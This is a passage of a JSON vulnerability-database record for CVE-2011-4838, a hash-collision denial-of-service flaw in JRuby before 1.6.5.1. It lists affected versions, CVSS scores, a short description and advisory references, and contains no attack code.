"jruby", "operator": "eq", "version": "1.1.4"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.5"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.8"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.5"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.4"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.6"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.9"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:jruby:jruby:0.9.2", "cpe:/a:jruby:jruby:1.1.6", "cpe:/a:jruby:jruby:1.3.1", "cpe:/a:jruby:jruby:1.0.0", "cpe:/a:jruby:jruby:1.5.0", "cpe:/a:jruby:jruby:1.3.0", "cpe:/a:jruby:jruby:1.1.1", "cpe:/a:jruby:jruby:1.5.1", "cpe:/a:jruby:jruby:0.9.0", "cpe:/a:jruby:jruby:1.1.4", "cpe:/a:jruby:jruby:1.6.5", "cpe:/a:jruby:jruby:1.6.3", "cpe:/a:jruby:jruby:1.4.1", "cpe:/a:jruby:jruby:1.0.3", "cpe:/a:jruby:jruby:1.0", "cpe:/a:jruby:jruby:1.5.6", "cpe:/a:jruby:jruby:1.1.2", "cpe:/a:jruby:jruby:1.1.5", "cpe:/a:jruby:jruby:1.2.0", "cpe:/a:jruby:jruby:1.6.0", "cpe:/a:jruby:jruby:1.6.1", "cpe:/a:jruby:jruby:1.4.0", "cpe:/a:jruby:jruby:1.5.2", "cpe:/a:jruby:jruby:0.9.9", "cpe:/a:jruby:jruby:1.1", "cpe:/a:jruby:jruby:1.6.2", "cpe:/a:jruby:jruby:1.5.3", "cpe:/a:jruby:jruby:1.5.4", "cpe:/a:jruby:jruby:1.0.1", "cpe:/a:jruby:jruby:1.1.3", "cpe:/a:jruby:jruby:1.6.4", "cpe:/a:jruby:jruby:1.0.2", "cpe:/a:jruby:jruby:1.5.5", "cpe:/a:jruby:jruby:0.9.8", "cpe:/a:jruby:jruby:0.9.1"], "cpe23": ["cpe:2.3:a:jruby:jruby:1.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:b1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.2:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2011-4838"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:01:29", "references": [{"idList": ["VU:903934"], "type": "cert"}, {"idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"], "type": "freebsd"}, {"idList": ["OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:71568"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["DEBIAN:DLA-209-1:3C908"], "type": "debian"}, {"idList": ["GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL"], "type": "nessus"}, {"idList": ["SSV:26121"], "type": "seebug"}, {"idList": ["GLSA-201207-06"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2020-09-21T14:01:29", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "234b1ca5b9cb12c8664950ee9096e47e393540c701fb0f7a600f43b2c42a0661", "hashmap": [{"hash": "237c187a60e5866b50769c5eb9af0909", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "72e9a78eca65791c691b3c7de39604c5", "key": "cpe"}, {"hash": "37cda89e37d1920fde85ffc53ccf51b9", "key": "href"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "20da023bb2c9bddaa0becd23dddd45f3", "key": "cvelist"}, {"hash": "8ed03f9772621a65835783a157489115", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afeb3f4dc39a66c2edac571149da1a7c", "key": "cpe23"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5c1c2a59f06ce368ba56a83d910aaa0a", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "51ec4a169231853196ced711c9889a34", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4838", "id": "CVE-2011-4838", "lastseen": "2020-09-21T14:01:29", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://security.gentoo.org/glsa/glsa-201207-06.xml", "http://rhn.redhat.com/errata/RHSA-2012-1232.html", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://secunia.com/advisories/50084", "http://secunia.com/advisories/47407", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019", "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"], "reporter": "cve@mitre.org", "title": "CVE-2011-4838", "type": "cve", "viewCount": 0}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:01:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.4"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.6"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.6"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "le", "version": "1.6.5"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.2.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.2.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.2.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.4"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.5"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.8"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.5"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.4"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.6"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.3.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.9"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.4.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.1"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:jruby:jruby:0.9.2", "cpe:/a:jruby:jruby:1.1.6", "cpe:/a:jruby:jruby:1.3.1", "cpe:/a:jruby:jruby:1.0.0", "cpe:/a:jruby:jruby:1.5.0", "cpe:/a:jruby:jruby:1.3.0", "cpe:/a:jruby:jruby:1.1.1", "cpe:/a:jruby:jruby:1.5.1", "cpe:/a:jruby:jruby:0.9.0", "cpe:/a:jruby:jruby:1.1.4", "cpe:/a:jruby:jruby:1.6.5", "cpe:/a:jruby:jruby:1.6.3", "cpe:/a:jruby:jruby:1.4.1", "cpe:/a:jruby:jruby:1.0.3", "cpe:/a:jruby:jruby:1.0", "cpe:/a:jruby:jruby:1.5.6", "cpe:/a:jruby:jruby:1.1.2", "cpe:/a:jruby:jruby:1.1.5", "cpe:/a:jruby:jruby:1.2.0", "cpe:/a:jruby:jruby:1.6.0", "cpe:/a:jruby:jruby:1.6.1", "cpe:/a:jruby:jruby:1.4.0", "cpe:/a:jruby:jruby:1.5.2", "cpe:/a:jruby:jruby:0.9.9", "cpe:/a:jruby:jruby:1.1", "cpe:/a:jruby:jruby:1.6.2", "cpe:/a:jruby:jruby:1.5.3", "cpe:/a:jruby:jruby:1.5.4", "cpe:/a:jruby:jruby:1.0.1", "cpe:/a:jruby:jruby:1.1.3", "cpe:/a:jruby:jruby:1.6.4", "cpe:/a:jruby:jruby:1.0.2", "cpe:/a:jruby:jruby:1.5.5", "cpe:/a:jruby:jruby:0.9.8", "cpe:/a:jruby:jruby:0.9.1"], "cpe23": ["cpe:2.3:a:jruby:jruby:1.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:b1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.4.0:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.0:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:0.9.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1:rc3:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.2.0:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.6:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.4.0:rc3:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.3.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:0.9.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0.0:rc3:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.0:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.3.0:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:0.9.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.2.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0.0:rc2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:0.9.9:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.6:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1:b1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:0.9.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.4.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": 